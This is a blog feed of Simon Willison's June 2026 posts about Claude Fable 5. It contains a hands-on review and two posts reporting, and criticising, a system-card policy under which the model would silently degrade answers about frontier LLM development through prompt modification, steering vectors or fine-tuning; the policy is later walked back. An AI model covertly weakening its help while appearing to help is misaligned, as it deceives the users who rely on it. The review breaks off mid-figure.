<?xml version="1.0" encoding="utf-8"?>
<feed xml:lang="en-us" xmlns="http://www.w3.org/2005/Atom"><title>Simon Willison's Weblog: claude</title><link href="http://simonwillison.net/" rel="alternate"/><link href="http://simonwillison.net/tags/claude.atom" rel="self"/><id>http://simonwillison.net/</id><updated>2026-06-11T03:45:49+00:00</updated><author><name>Simon Willison</name></author><entry><title>Anthropic Walks Back Policy That Could Have ‘Sabotaged’ AI Researchers Using Claude</title><link href="https://simonwillison.net/2026/Jun/11/anthropic-walks-back-policy/#atom-tag" rel="alternate"/><published>2026-06-11T03:45:49+00:00</published><updated>2026-06-11T03:45:49+00:00</updated><id>https://simonwillison.net/2026/Jun/11/anthropic-walks-back-policy/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.wired.com/story/anthropic-responds-to-backlash-on-claudes-secret-sabotage-on-ai-research/"&gt;Anthropic Walks Back Policy That Could Have ‘Sabotaged’ AI Researchers Using Claude&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Big scoop for Maxwell Zeff at Wired:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;“We’re changing Fable 5’s safeguards for frontier LLM development to make them visible.” Anthropic said in a statement to WIRED. “We made the wrong tradeoff and we apologize for not getting the balance right.”&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;There's been a &lt;em&gt;huge&lt;/em&gt; outcry about Anthropic's policy, &lt;a href="https://simonwillison.net/2026/Jun/10/if-claude-fable-stops-helping-you/"&gt;tucked away in their system card&lt;/a&gt;, that Claude Fable/Mythos would identify "requests targeting frontier LLM development" and "limit effectiveness" without notifying the user.&lt;/p&gt;
&lt;p&gt;It's good news that they're dropping the invisible aspect of this. It would be a whole lot better of they dropped this category of refusals entirely.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: More details from &lt;a href="https://twitter.com/claudedevs/status/2064949876463645026"&gt;@ClaudeDevs on Twitter&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;We’re rolling out changes to make Fable 5’s safeguards for frontier LLM development visible.&lt;/p&gt;
&lt;p&gt;Starting this week, flagged requests will visibly fall back to Opus 4.8—the same as our safeguards for cyber and bio. You will see this every time it happens. On the API, any flagged requests will return a reason for their refusal (coming to server-side fallback in the next few days).&lt;/p&gt;
&lt;p&gt;We wanted to deploy Fable 5 to our users quickly and safely. Visible safeguards can be probed, so they have to be robust, which takes time to get right. Invisible safeguards can be targeted more narrowly, allowing us to ship quickly with very few false positives. We went with invisible safeguards for this reason—and that was the wrong tradeoff. You should have visibility into the safeguards we have in place, and why. We’re sorry for not getting the balance right.&lt;/p&gt;
&lt;/blockquote&gt;

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/zeffmax/status/2064910040503627917"&gt;@zeffmax&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude-mythos"&gt;claude-mythos&lt;/a&gt;&lt;/p&gt;



</summary><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="anthropic"/><category term="claude"/><category term="ai-ethics"/><category term="claude-mythos"/></entry><entry><title>If Claude Fable stops helping you, you'll never know</title><link href="https://simonwillison.net/2026/Jun/10/if-claude-fable-stops-helping-you/#atom-tag" rel="alternate"/><published>2026-06-10T00:37:25+00:00</published><updated>2026-06-10T00:37:25+00:00</updated><id>https://simonwillison.net/2026/Jun/10/if-claude-fable-stops-helping-you/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://jonready.com/blog/posts/claude-fable5-is-allowed-to-sabotage-your-app-if-youre-a-competitor.html"&gt;If Claude Fable stops helping you, you&amp;#x27;ll never know&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Jonathon Ready highlights one of the more eyebrow-raising details from the &lt;a href="https://www-cdn.anthropic.com/d00db56fa754a1b115b6dd7cb2e3c342ee809620.pdf"&gt;319 page system card&lt;/a&gt; for Fable 5 and Mythos 5. Here's a longer excerpt, highlights mine:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;In light of the ability of recent models to &lt;a href="https://www.anthropic.com/institute/recursive-self-improvement"&gt;accelerate their own development&lt;/a&gt;, we’ve &lt;strong&gt;implemented new interventions&lt;/strong&gt; that limit Claude’s effectiveness for requests targeting frontier LLM development (for example, on &lt;strong&gt;building pretraining pipelines, distributed training infrastructure, or ML accelerator design&lt;/strong&gt;). Using Claude to develop competing models already violates our &lt;a href="https://www.anthropic.com/legal/consumer-terms"&gt;Terms of Service&lt;/a&gt;, but enforcing this restriction through our safeguards avoids accelerating the actors most willing to violate these terms.&lt;/p&gt;
&lt;p&gt;Unlike our interventions for cybersecurity, biology and chemistry, and distillation attempts, &lt;strong&gt;these safeguards will not be visible to the user&lt;/strong&gt;. Fable 5 will not fall back to a different model. Instead, the safeguards will limit effectiveness through methods such as prompt modification, steering vectors, or parameter-efficient fine-tuning (PEFT). These interventions will not affect the vast majority of coding work. We estimate they will impact ~0.03% of traffic, concentrated in fewer than 0.1% of organizations.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I believe this is the first time Anthropic have announced these kinds of silent interventions. The justification still feels pretty science-fiction to me - the linked article talks about "recursive self-improvement". I'm not at all keen on a model that silently corrupts its replies to questions about "ML accelerator design" purely to slow down research that might conflict with Anthropic's own goals!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: Anthropic &lt;a href="https://simonwillison.net/2026/Jun/11/anthropic-walks-back-policy/"&gt;walked back this policy&lt;/a&gt; in the face of widespread outrage from the research community.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=48467896"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-ethics"&gt;ai-ethics&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude-mythos"&gt;claude-mythos&lt;/a&gt;&lt;/p&gt;



</summary><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="anthropic"/><category term="claude"/><category term="ai-ethics"/><category term="claude-mythos"/></entry><entry><title>Initial impressions of Claude Fable 5</title><link href="https://simonwillison.net/2026/Jun/9/claude-fable-5/#atom-tag" rel="alternate"/><published>2026-06-09T23:59:54+00:00</published><updated>2026-06-09T23:59:54+00:00</updated><id>https://simonwillison.net/2026/Jun/9/claude-fable-5/#atom-tag</id><summary type="html">
    &lt;p&gt;I didn't have early access to today's &lt;a href="https://www.anthropic.com/news/claude-fable-5-mythos-5"&gt;Claude Fable 5&lt;/a&gt; release, but I've spent the past ~5.5 hours putting it through its paces. My initial impressions are that this is something of a &lt;em&gt;beast&lt;/em&gt;. It's slow, expensive and has been quite happily churning through everything I've thrown at it so far. As is frequently the case with current frontier models the challenge is finding tasks that it can't do.&lt;/p&gt;
&lt;p&gt;First, let's review the key characteristics.&lt;/p&gt;
&lt;p&gt;Anthropic claim that &lt;a href="https://www.anthropic.com/news/claude-fable-5-mythos-5"&gt;Claude Fable 5&lt;/a&gt; offers the same performance as Claude Mythos 5, except with much more strict guardrails in place to prevent it being used for harmful things. Those guardrails trigger often enough that the Claude API has new mechanisms for letting you know when you hit them, and even has a &lt;a href="https://platform.claude.com/docs/en/build-with-claude/refusals-and-fallback"&gt;new option&lt;/a&gt; to request it falls back to another model automatically if something gets rejected.&lt;/p&gt;
&lt;p&gt;Claude Mythos 5 is out today as well, &lt;a href="https://platform.claude.com/docs/en/about-claude/models/introducing-claude-fable-5-and-claude-mythos-5"&gt;Anthropic say it&lt;/a&gt; "Shares Claude Fable 5's capabilities without the safety classifiers".&lt;/p&gt;
&lt;p&gt;The models have a 1 million token context window, 128,000 maximum output tokens and a knowledge cut-off date of January 2026.&lt;/p&gt;
&lt;p&gt;They are priced at twice the price of Claude Opus 4.5/4.6/4.7/4.8: $10/million input tokens and $50/million output tokens. There's no increase in price for longer context usage.&lt;/p&gt;
&lt;p&gt;Other than that the &lt;a href="https://platform.claude.com/docs/en/about-claude/models/introducing-claude-fable-5-and-claude-mythos-5"&gt;upgrade guide&lt;/a&gt; is substantially thinner than &lt;a href="https://platform.claude.com/docs/en/about-claude/models/whats-new-claude-4-8"&gt;the similar guide for Opus 4.8&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="the-big-model-smell"&gt;The big model smell&lt;/h4&gt;
&lt;p&gt;The best way to describe Fable is that it feels &lt;em&gt;big&lt;/em&gt;. Not just in terms of speed and cost, but also in how much it knows.&lt;/p&gt;
&lt;p&gt;Here's an example prompt, which I used to compare Fable's knowledge with Opus 4.8 (typo included):&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;List all of Simon Willion's open source projects, most recent first, each with a rough date of when they were first released&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Opus 4.8's reply &lt;a href="https://gist.github.com/simonw/e77abf645156ade8c5c610f524226dcb#response-1"&gt;started like this&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I don't have a reliable, comprehensive, and date-verified list of all of Simon Willison's open source projects, and I want to be honest about that rather than risk giving you inaccurate dates or fabricated entries.&lt;/p&gt;
&lt;p&gt;Here's what I can tell you with reasonable confidence:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Well-known projects by Simon Willison:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;LLM&lt;/strong&gt; (~2023) – A command-line tool and Python library for interacting with large language models.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Datasette&lt;/strong&gt; (~2017) – A tool for exploring and publishing data, probably his most prominent recent project.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;sqlite-utils&lt;/strong&gt; (~2018-2019) – A Python library and CLI tool for manipulating SQLite databases, often used alongside Datasette.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Django&lt;/strong&gt; (2005) – He is one of the co-creators of the Django web framework, along with Adrian Holovaty, originally developed at the Lawrence Journal-World newspaper.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;He also maintains a large ecosystem of &lt;strong&gt;Datasette plugins&lt;/strong&gt; and many smaller utilities (often with names like &lt;code&gt;shot-scraper&lt;/code&gt;, various &lt;code&gt;*-to-sqlite&lt;/code&gt; tools for importing data, etc.).&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That's not bad. Here's &lt;a href="https://gist.github.com/simonw/e77abf645156ade8c5c610f524226dcb#response"&gt;the start of the response&lt;/a&gt; for the exact same prompt from Fable 5 - both models were running without access to search:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I think you mean &lt;strong&gt;Simon Willison&lt;/strong&gt; — the prolific open source developer, co-creator of Django, and creator of Datasette.&lt;/p&gt;
&lt;p&gt;An important caveat upfront: a truly complete list isn't feasible. Simon Willison is famously prolific — he has published &lt;strong&gt;hundreds&lt;/strong&gt; of repositories (Datasette alone has 100+ plugins, many written by him), and my knowledge has a cutoff date, so I'll be missing his most recent work. Below are his &lt;strong&gt;notable&lt;/strong&gt; projects with approximate initial release dates, most recent first:&lt;/p&gt;
&lt;h2 id="notable-projects-approximate-dates-"&gt;Notable projects (approximate dates)&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;files-to-prompt&lt;/strong&gt; (April 2024) – concatenates files into a single prompt for LLMs&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;datasette-extract&lt;/strong&gt; (2024) – plugin for extracting structured data using LLMs&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;LLM&lt;/strong&gt; (May–June 2023) – CLI tool and Python library for interacting with large language models, plus a large ecosystem of plugins (llm-gpt4all, llm-mistral, llm-claude, etc., 2023 onward)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;symbex&lt;/strong&gt; (June 2023) – search Python code for symbols&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ttok&lt;/strong&gt; and &lt;strong&gt;strip-tags&lt;/strong&gt; (May 2023) – CLI tools for token counting and HTML cleanup for LLM pipelines&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;datasette-lite&lt;/strong&gt; (May 2022) – Datasette running entirely in the browser via WebAssembly/Pyodide&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;shot-scraper&lt;/strong&gt; (March 2022) – automated website screenshots via Playwright&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;s3-credentials&lt;/strong&gt; (November 2021) – CLI for creating scoped AWS S3 credentials&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;django-sql-dashboard&lt;/strong&gt; (2021) – SQL reporting dashboards for Django&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dogsheep suite&lt;/strong&gt; (2019) – personal analytics tools: twitter-to-sqlite, github-to-sqlite, healthkit-to-sqlite, dogsheep-beta, etc.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;sqlite-utils&lt;/strong&gt; (2018) – CLI and Python library for manipulating SQLite databases&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Datasette&lt;/strong&gt; (November 2017) – his flagship project; tool for exploring and publishing data&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;csvs-to-sqlite&lt;/strong&gt; (2017) – convert CSV files to SQLite&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Various early tools&lt;/strong&gt; (~2007–2010) – soupselect, json-head, geocoders, and others&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Django&lt;/strong&gt; (developed 2003–2005, open-sourced July 2005) – co-created with Adrian Holovaty at the Lawrence Journal-World&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;(Here's &lt;a href="https://gist.github.com/simonw/8d05ce836d44bd8543055c9614f7c478"&gt;GPT-5.5 for good measure&lt;/a&gt;. It listed even more projects than Fable did!)&lt;/p&gt;
&lt;p&gt;In the past I've stated that I don't care about how much models &lt;em&gt;know&lt;/em&gt; - I want them to be able to manipulate text and code in useful ways and actively look up the information they need via search tools, not bake it into their weights.&lt;/p&gt;
&lt;p&gt;But knowledge like this is a reasonably good proxy for model size - you can cram a whole lot more details about the world into a larger number of parameters.&lt;/p&gt;
&lt;p&gt;Does &lt;em&gt;knowing more stuff&lt;/em&gt; mean the model is better at the tasks we pose to it? I can certainly imagine how a coding model with deeper knowledge of modern libraries and patterns could crunch through coding tasks more effectively.&lt;/p&gt;
&lt;p&gt;Is Fable really bigger than Opus? Anthropic haven't said anything about model size, so all we have are tea-leaves, but the speed, pricing and my own poking at its knowledge make me think that it's a large model. Maybe the largest yet from any vendor.&lt;/p&gt;
&lt;h4 id="using-fable-in-claude-ai"&gt;Using Fable in Claude.ai&lt;/h4&gt;
&lt;p&gt;Anthropic made Fable 5 available across all of their surfaces - the &lt;a href="https://claude.ai/"&gt;Claude.ai&lt;/a&gt; chat interface, Claude Code for web, Claude Code CLI and Claude Cowork as well. The model is available "until June 22nd" on the subscription plans (I'm on $100/month Max at the moment), after which it will be billed extra.&lt;/p&gt;
&lt;p&gt;Claude.ai is often under-estimated. Since &lt;a href="https://simonwillison.net/2025/Sep/9/claude-code-interpreter/"&gt;September 2025&lt;/a&gt; every chat has had access to a full container environment to run code, including the ability to install additional packages and even clone repositories directly from GitHub.&lt;/p&gt;
&lt;p&gt;Last week &lt;a href="https://simonwillison.net/2026/Jun/6/micropython-in-a-sandbox/"&gt;I released micropython-wasm&lt;/a&gt;, a Python library that uses &lt;a href="https://wasmtime.dev/"&gt;wasmtime&lt;/a&gt; to run a custom build of MicroPython in WebAssembly to act as a sandbox for untrusted Python code.&lt;/p&gt;
&lt;p&gt;I decided to see if Fable could upgrade that to running full Python instead. I started with this prompt:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;Clone simonw/micropython-wasm from GitHub and research how this could use a full Python as opposed to MicroPython&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Fable identified that it could use Brett Cannon's &lt;a href="https://github.com/brettcannon/cpython-wasi-build/releases"&gt;cpython-wasi-build&lt;/a&gt; builds for this, but was unable to download them itself due to environment restrictions.&lt;/p&gt;
&lt;p&gt;So I grabbed the two zip files from that page and uploaded them to Claude:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;Here's the Brett Cannon builds&lt;/code&gt; (&lt;code&gt;python-3.zip&lt;/code&gt;, &lt;code&gt;_build-python-3.zip&lt;/code&gt; as attachments)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And that was that. It churned away for a few minutes and got the entire thing working.&lt;/p&gt;
&lt;p&gt;Part of the response included:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I tried the cleaner single-zip-stdlib approach to shrink the filesystem surface, but CPython's &lt;code&gt;getpath&lt;/code&gt; bootstrap fails to find &lt;code&gt;encodings&lt;/code&gt; from inside a zip without more prefix finessing — the directory-preopen approach works reliably, so that's what the PoC uses. The zip path is solvable but needs &lt;code&gt;_PYTHONHOME&lt;/code&gt;/frozen-getpath work.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So I said:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;Try a bit more at the single-zip-stdlib problem&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Then a little later:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;I want a wheel that has the whole system in it, the Python wrappers and the WASM files and the stdlibrary, so I can do uv run --with path-to-whl python -c "demo code"&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;... and it gave me &lt;a href="https://static.simonwillison.net/static/cors-allow/2026/cpython_wasm-0.1.0-py3-none-any.whl"&gt;this 13.9MB cpython_wasm-0.1.0-py3-none-any.whl&lt;/a&gt; file. You can try running Python code in a sandbox using that wheel URL and &lt;code&gt;uv&lt;/code&gt; like this:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;uv run --with https://static.simonwillison.net/static/cors-allow/2026/cpython_wasm-0.1.0-py3-none-any.whl \
  cpython-wasm -c &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;print(45 ** 56)&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here's &lt;a href="https://claude.ai/share/a73b8b8b-8ebc-4fef-9e5c-7438e5e7ae35"&gt;the full chat transcript&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This was a &lt;em&gt;very&lt;/em&gt; strong start.&lt;/p&gt;
&lt;h4 id="adding-features-to-datasette-agent-and-llm-using-claude-code"&gt;Adding features to Datasette Agent and LLM using Claude Code&lt;/h4&gt;
&lt;p&gt;Before I'd realized it was Fable day, my stretch goal for today was to add a new feature to &lt;a href="https://agent.datasette.io/"&gt;Datasette Agent&lt;/a&gt;: I wanted tool calls within that agent software to gain the ability to pause mid-execution and request approval directly from the user.&lt;/p&gt;
&lt;p&gt;This felt like a suitably meaty task to throw at the new model.&lt;/p&gt;
&lt;p&gt;Over the course of the day Fable not only &lt;a href="https://github.com/datasette/datasette-agent/pull/20"&gt;solved that problem&lt;/a&gt;, it also identified and then implemented four issues in my underlying LLM library that would help support this kind of advanced pause-resume mechanism in tool calls.&lt;/p&gt;
&lt;p&gt;It got everything working first using somewhat gnarly hacks, but the moment I told it that changes to LLM itself were in scope it set to work unraveling the hacks and turning them into supported features of LLM instead.&lt;/p&gt;
&lt;p&gt;My stretch goal turned into &lt;a href="https://llm.datasette.io/en/latest/changelog.html#a3-2026-06-09"&gt;LLM 0.32a3&lt;/a&gt;, almost entirely written by Fable. Here are the release notes:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Driven by the needs of &lt;a href="https://github.com/datasette/datasette-agent"&gt;Datasette Agent&lt;/a&gt;'s human-in-the-loop &lt;code&gt;ask_user()&lt;/code&gt; feature, made the following improvements to how tool calls work:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Tool implementations can declare a parameter named &lt;code&gt;llm_tool_call&lt;/code&gt; in order to be passed the &lt;code&gt;llm.ToolCall&lt;/code&gt; object for the current invocation. This allows them to access the current &lt;code&gt;llm_tool_call.tool_call_id&lt;/code&gt;. See &lt;a href="https://llm.datasette.io/en/latest/python-api.html#python-api-tools-llm-tool-call"&gt;Accessing the tool call from inside a tool&lt;/a&gt;. &lt;a href="https://github.com/simonw/llm/pull/1480"&gt;#1480&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Every tool call is now guaranteed a unique &lt;code&gt;tool_call_id&lt;/code&gt; - providers that do not supply one get a synthesized &lt;code&gt;tc_&lt;/code&gt;-prefixed ULID. &lt;a href="https://github.com/simonw/llm/pull/1481"&gt;#1481&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Tools can raise a &lt;code&gt;llm.PauseChain&lt;/code&gt; exception to cleanly pause the tool chain, useful for things like waiting for human approval. The exception propagates to the caller with &lt;code&gt;.tool_call&lt;/code&gt; and &lt;code&gt;.tool_results&lt;/code&gt; (completed sibling results) attached, and no model call is made with a placeholder result. See &lt;a href="https://llm.datasette.io/en/latest/python-api.html#python-api-tools-pause"&gt;Pausing a chain from inside a tool&lt;/a&gt;. &lt;a href="https://github.com/simonw/llm/pull/1482"&gt;#1482&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Failure semantics for concurrent tool execution: async sibling tool calls always run to completion before a pause or hook exception propagates. &lt;a href="https://github.com/simonw/llm/pull/1482"&gt;#1482&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Chains can now resume from a &lt;code&gt;messages=&lt;/code&gt; history ending in unresolved tool calls: the calls are executed through the normal &lt;code&gt;before_call&lt;/code&gt;/&lt;code&gt;after_call&lt;/code&gt; machinery before the first model call, skipping any that already have results. The &lt;code&gt;execute_tool_calls()&lt;/code&gt; method also accepts a new optional &lt;code&gt;tool_calls_list=&lt;/code&gt; argument for executing an explicit list of &lt;code&gt;ToolCall&lt;/code&gt; objects in place of the calls requested by the response. See &lt;a href="https://llm.datasette.io/en/latest/python-api.html#python-api-tools-resume"&gt;Resuming a chain with pending tool calls&lt;/a&gt;. &lt;a href="https://github.com/simonw/llm/pull/1482"&gt;#1482&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;Fixed a bug where the async tool executor silently dropped calls to tools not present in &lt;code&gt;tools=&lt;/code&gt; - these now return &lt;code&gt;Error: tool "..." does not exist&lt;/code&gt; results, matching the sync executor. &lt;a href="https://github.com/simonw/llm/pull/1483"&gt;#1483&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;I'm really impressed with the quality of API design, tests, code and documentation that Fable put together for this. I spent several hours on it today, but it feels like several days' worth of work.&lt;/p&gt;
&lt;h4 id="how-much-i-ve-spent"&gt;How much I've spent&lt;/h4&gt;
&lt;p&gt;I recently started using &lt;a href="https://agentsview.io/"&gt;AgentsView&lt;/a&gt; to help track my local LLM usage across all of the different coding agents. I published a &lt;a href="https://til.simonwillison.net/llms/agentsview-custom-model-price"&gt;TIL today&lt;/a&gt; about adding custom Fable pricing to that tool, which I expect will not be necessary in the very near future.&lt;/p&gt;
&lt;p&gt;After setting the price, I ran this command to start a localhost web server to explore my usage:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;uvx agentsview serve
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here's the treemap showing the breakdown of my Fable usage across various projects today:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/agentsview-fable-full-day.jpg" alt="Screenshot of a cost tracking dashboard with two panels. The first panel is titled &amp;quot;Cost Attribution&amp;quot; with toggle buttons for Project / Model / Agent and Treemap / List, with Project and Treemap selected. Italic text reads &amp;quot;Click to hide from chart&amp;quot;. A treemap shows a large red block labeled prod_datasette_agent $99.26 89.9%, with smaller blocks to its right labeled cloud (blue), datasette (teal), llm (red), and money (pink), plus a tiny orange sliver. A legend lists: 1 prod_datasette_agent $99.26, 2 cloud $3.98, 3 datasette $2.81, 4 llm $2.30, 5 money $1.92, 6 simon $0.15. The second panel is titled &amp;quot;Top Sessions by Cost&amp;quot; and lists nine sessions, each with a &amp;quot;Claude&amp;quot; badge, a prompt excerpt, a project name with a session UUID (omitted here), a token count, and a cost: 1. Review ./datasette-agent and ./datasette-apps - we are going to add a new feature to agent but you ... prod_datasette_agent, 78.2M, $99.26. 2. issues.db is a copy of the Datasette issues database. There are a LOT of notes in there relating to... datasette, 826.8k, $2.81. 3. Consult fly-docs and then look at datasette.cloud (which launches fly machines) and datasettecloud-... cloud, 924.7k, $2.61. 4. simonwillisonblog.db is a copy of my blog, plus all my software releases and other interesting thin... money, 542.9k, $1.92. 5. Look in datasette.cloud and figure out all remaining steps and decisions that need to be made in or... cloud, 455k, $1.37. 6. Review PRs and issues filed against this repo within the last 4 weeks and see if any deserve to be ... llm, 323.3k, $0.95. 7. run mypy, llm, 320.9k, $0.76. 8. [Image #1] fix this in github actions, llm, 183.9k, $0.59. 9. simon, simon, 26.4k, $0.15." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;I used $110.42 worth of tokens today, all as part of my $100/month subscription.&lt;/p&gt;
&lt;h4 id="and-some-pelicans"&gt;And some pelicans&lt;/h4&gt;
&lt;p&gt;I ran "Generate an SVG of a pelican riding a bicycle" against all five thinking effort levels with Fable.&lt;/p&gt;
&lt;p&gt;Here are &lt;a href="https://tools.simonwillison.net/markdown-svg-renderer#url=https%3A%2F%2Fgist.github.com%2Fsimonw%2F94fde31c34a0400c1d29f57e6a708e6b"&gt;the results&lt;/a&gt;, including the token cost for each one:&lt;/p&gt;

&lt;div style="display: flex; flex-wrap: wrap; gap: 10px; margin-bottom: 1em"&gt;
  &lt;figure style="margin: 0; flex: 1 1 30%;"&gt;
    &lt;img src="https://static.simonwillison.net/static/2026/fable-low.jpg" alt="low" style="width: 100%; height: auto;" /&gt;
    &lt;figcaption style="text-align: center;"&gt;low: &lt;a href="https://www.llm-prices.com/#it=25&amp;amp;ot=1929&amp;amp;sel=claude-fable-5"&gt;1,929 out, 9.67c&lt;/a&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;figure style="margin: 0; flex: 1 1 30%;"&gt;
    &lt;img src="https://static.simonwillison.net/static/2026/fable-medium.jpg" alt="medium" style="width: 100%; height: auto;" /&gt;
    &lt;figcaption style="text-align: center;"&gt;medium: &lt;a href="https://www.llm-prices.com/#it=25&amp;amp;ot=2290&amp;amp;sel=claude-fable-5"&gt;2,290 out, 11.475c&lt;/a&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;figure style="margin: 0; flex: 1 1 30%;"&gt;
    &lt;img src="https://static.simonwillison.net/static/2026/fable-high.jpg" alt="high" style="width: 100%; height: auto;" /&gt;
    &lt;figcaption style="text-align: center;"&gt;high: &lt;a href="https://www.llm-prices.com/#it=25&amp;amp;ot=2057&amp;amp;sel=claude-fable-5"&gt;2,057 out, 10.31c&lt;/a&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;figure style="margin: 0; flex: 1 1 45%;"&gt;
    &lt;img src="https://static.simonwillison.net/static/2026/fable-xhigh.jpg" alt="xhigh" style="width: 100%; height: auto;" /&gt;
    &lt;figcaption style="text-align: center;"&gt;xhigh: &lt;a href="https://www.llm-prices.com/#it=25&amp;amp;ot=5992&amp;amp;sel=claude-fable-5"&gt;5,992 out, 29.985c&lt;/a&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;figure style="margin: 0; flex: 1 1 45%;"&gt;
    &lt;img src="https://static.simonwillison.net/static/2026/fable-max.jpg" alt="max" style="width: 100%; height: auto;" /&gt;
